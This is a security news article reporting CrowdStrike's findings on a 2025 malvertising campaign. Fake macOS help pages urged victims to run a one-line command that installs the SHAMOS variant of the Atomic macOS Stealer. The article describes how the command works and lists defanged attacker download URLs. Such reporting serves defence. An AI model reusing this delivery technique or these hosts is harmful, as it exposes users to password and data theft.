A sophisticated malvertising campaign which sought to deploy a variant ofAtomic macOS Stealer (AMOS)has targeted hundreds of organizations.
Between June and August 2025, the campaign saw victims diverted to fraudulent macOS help websites and encouraged them to execute a malicious one-line installation command.
The aim was for victims to ultimately be infected with the SHAMOS variant of the AMOS infostealer, which was developed by malware-as-a-service (MaaS) group Cookie Spider.
During this period, CrowdStrike said it blocked the malvertising campaign from attempting to compromise over 300 of its customer environments.
“This campaign underscores the popularity of malicious one-line installation commands among eCrime actors,” CrowdStrike said in a recent blog.
This technique allows cybercriminals to bypass Gatekeeper security checks and install the Mach-O (a binary format primarily used by macOS) executable directly onto victim devices.
Cuckoo Stealer and SHAMOS operators have previously leveraged this method in Homebrew malvertising campaigns occurring between May 2024 and January 2025.
CrowdStrike noted that the malvertising site appeared Google searchers in locations including the UK, UK, Japan, China, Colombia, Canada, Mexico, Italy and others.
The firm’s analysis said that no victims were located in Russia.
“This is likely due to the fact that Russian eCrime forums prohibit commodity malware operators from targeting users based in Russia,” the company said.
The fraudulent macOS help websites gave false instructions on how users could fix their issues.
However, the pages instruct the victims to copy, past and execute a malicious one-line installation command which decides the Base64-enconded string.
This then downloads a file from https[:]//icloudservers[.]com/gm/install[.]sh. This file is a Bash script that captures the user’s password and downloads aSHAMOSMach-O executable fromhttps[:]//icloudservers[.]com/gm/update.
Since first reporting on this type of campaign in June 2025, CrowdStrike Counter Adversary Operations said it has continued to observe opportunistic eCrime threat actors leveraging malicious GitHub repositories to prompt victims to execute commands that downloadSHAMOS.
CrowdStrike’s Counter Adversary Operations has assessed with high confidents that eCrome actors are likely to continue to leverage both malvertising and one-line instillation commands to distribute macOS information stealers.